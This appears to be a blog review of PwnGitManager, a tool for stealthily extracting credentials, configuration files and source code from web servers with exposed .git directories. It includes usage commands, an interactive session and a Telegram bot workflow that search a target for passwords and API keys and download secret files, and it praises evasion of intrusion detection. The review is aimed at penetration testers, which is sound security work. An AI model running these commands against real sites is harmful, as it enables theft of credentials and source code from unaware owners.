PwnGitManager: Surgical Git Repository Extraction for Security Researchers

Hook

Most Git dumping tools request thousands of objects and trigger every IDS in the building. PwnGitManager downloads a single 40KB file and gives you the entire repository structure.

Context

Exposed .git directories remain one of the most common critical findings in web application security assessments. Developers accidentally deploy their Git metadata to production servers, inadvertently exposing source code, configuration files, API keys, and database credentials. Traditional approaches to exploiting this misconfiguration involve tools like GitTools or git-dumper, which systematically request every object in the repository—sometimes thousands of HTTP requests that light up security monitoring like a Christmas tree.

PwnGitManager takes a different approach born from real-world penetration testing constraints. Instead of dumping everything and sorting through it later, it downloads only Git's index file—a binary database that Git uses to track the working directory state. This single file contains the complete directory structure, file names, and SHA-1 hashes of every file in the repository. For security researchers who need specific artifacts (database.yml, .env files, authentication code) rather than complete repository history, this surgical approach reduces network noise by orders of magnitude while delivering faster results.

Technical Insight

At its core, PwnGitManager is a parser for Git's binary index file format combined with a selective object retriever. The index file (.git/index) uses a custom binary format that begins with a 12-byte header containing a signature ("DIRC"), version number, and entry count. Each entry after the header describes a single tracked file with metadata including modification time, file size, SHA-1 hash, and pathname.

Here's how you'd use PwnGitManager in a typical engagement scenario:

# Command-line mode for scripted reconnaissance
python3 pwngitmanager.py --url https://target.com/.git/ --download "*.yml" --download "*.env"

# Or launch interactive shell for exploration
python3 pwngitmanager.py --url https://target.com/.git/ --interactive

Once in interactive mode, you get a familiar shell-like interface with tab completion:

pwngit> ls
app/
config/
db/
lib/
README.md
pwngit> cd config
pwngit:/config> search database
config/database.yml
config/database.sample.yml
pwngit:/config> get database.yml
[+] Downloaded: config/database.yml (2.3 KB)

The magic happens in how PwnGitManager reconstructs the repository structure. After downloading the index file, it parses the binary format to build an in-memory tree structure. When you request a file, it looks up the corresponding SHA-1 hash from the index and constructs the Git object path: .git/objects/ab/cdef123... where the first two characters become the subdirectory and the remaining characters form the filename. It then retrieves and decompresses the zlib-compressed object.

The tool's architecture separates concerns cleanly: a GitIndex class handles binary parsing, a FileTree class manages the directory structure and supports glob pattern matching, and a Downloader class handles HTTP operations with proxy support. This separation makes it trivial to extend—the included Telegram bot interface demonstrates this by wrapping the core functionality in a chat interface:

# Telegram bot allows remote operation during engagements
python3 telegram_bot.py --token YOUR_BOT_TOKEN

# Then from Telegram:
/start https://target.com/.git/
/ls
/search password
/get config/secrets.yml

For large repositories, the selective extraction capabilities become critical. Traditional dumpers might download 500MB of Git history when you only need three configuration files totaling 15KB. PwnGitManager's search and pattern matching let you pinpoint exactly what matters:

pwngit> search -r "api.*key"
app/services/stripe_api_key.rb
config/initializers/api_keys.rb
lib/third_party/api_key_validator.rb

pwngit> download "config/**/*.yml"
[+] Downloading 12 matching files...
[+] Downloaded: config/database.yml
[+] Downloaded: config/secrets.yml
[+] Downloaded: config/environments/production.yml
...

The implementation avoids Git's more complex pack file format, which bundles multiple objects into compressed archives with delta compression. This is both a limitation and a feature—pack files require significantly more parsing logic and would increase the tool's complexity, but most exposed Git directories in web roots contain unpacked objects from recent operations, making pack file support unnecessary for the majority of real-world scenarios.

Gotcha

PwnGitManager's minimalist approach comes with practical limitations that matter in certain scenarios. The most significant is the lack of SOCKS5 proxy support—it only handles HTTP/HTTPS proxies. During internal penetration tests where you've compromised an initial host and need to pivot through it to reach the target web application, you'll typically have a SOCKS proxy via SSH tunneling or Metasploit. The HTTP-only proxy support means you'll need to set up additional tooling (proxychains, redsocks) to bridge this gap, adding operational friction.

The tool also doesn't handle Git pack files, which become relevant when repositories have been garbage collected or are older. When Git packs objects, it moves them from individual files in .git/objects/ into compressed .pack files with delta compression. If your target repository has been packed, PwnGitManager will successfully parse the index and show you all the files, but downloads will fail with 404 errors. You'll see the tantalizing file listing but won't be able to retrieve anything. In practice, recently active repositories with exposed .git directories often haven't been garbage collected, but this is something to be aware of—you might need to fall back to a more comprehensive tool like git-dumper. The single-threaded download implementation also means bulk extraction can be slow compared to tools that parallelize requests.

Verdict

Use if: You're conducting penetration tests or bug bounties where stealth matters, need to quickly extract specific files from exposed Git repositories (credentials, configs, source code for vulnerability analysis), or are working within tight time constraints where downloading entire repositories would be inefficient. The Telegram bot interface is particularly valuable for red team operations requiring remote coordination. Skip if: You need complete repository history with all commits for forensic analysis, are working through SOCKS proxies without the ability to add HTTP proxy translation layers, encounter packed repositories, or need maximum speed for bulk extraction where the request volume isn't a concern. For those cases, git-dumper or GitHack provide more comprehensive functionality despite their noisier operation.